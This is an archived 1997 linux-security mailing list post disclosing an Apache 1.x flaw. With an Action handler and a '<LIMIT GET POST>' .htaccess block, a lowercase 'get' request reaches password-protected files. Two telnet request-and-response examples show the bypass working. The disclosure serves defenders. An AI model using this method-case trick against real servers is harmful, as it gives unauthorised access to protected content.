[1599] in linux-security and linux-alert archive
[linux-security] Security Hole. Appache.
daemon@ATHENA.MIT.EDU (Kirjushka)
Thu Sep 4 03:49:22 1997
Date: Thu, 4 Sep 1997 00:25:40 +0400 (MSD)
From: Kirjushka <kir@fipc.ru>
Reply-To: Kirjushka <kir@fipc.ru>
To: linux-security@redhat.com
Resent-From: linux-security@redhat.com
Sorry! Unknown (for me) behaviour of Apache was discovered. Suddenly.
Configuration detail:
Linux: 2.0.30
Apache: 1.x.x
srm.conf:
...
Action text/html /cgi-bin/exefile
...
/www-root/sec-dir/.htaccess:
AuthType Basic
AuthName authname
AuthUserFile /itc/passwd
<LIMIT GET POST>
require valid-user
</LIMIT>
Trying to "GET" and "get" some file from /www-root/sec-dir/ ...
----------------------------------------
Example #1:
$telnet www.host 80
GET /sec-dir/index.html http/1.1
HTTP/1.1 401 Authorization Required
..............
It's OK!
-----------------------------------------
Example #2:
$telnet www.host 80
get /sec-dir/index.html http/1.1
HTTP/1.1 200 OK
...........
It's quite OK for browser which doesn't know lower case "get".
-----------------------------------------
This feature disappears if you comment 'Action' or '<LIMIT>' lines.
Sorry again! Kir.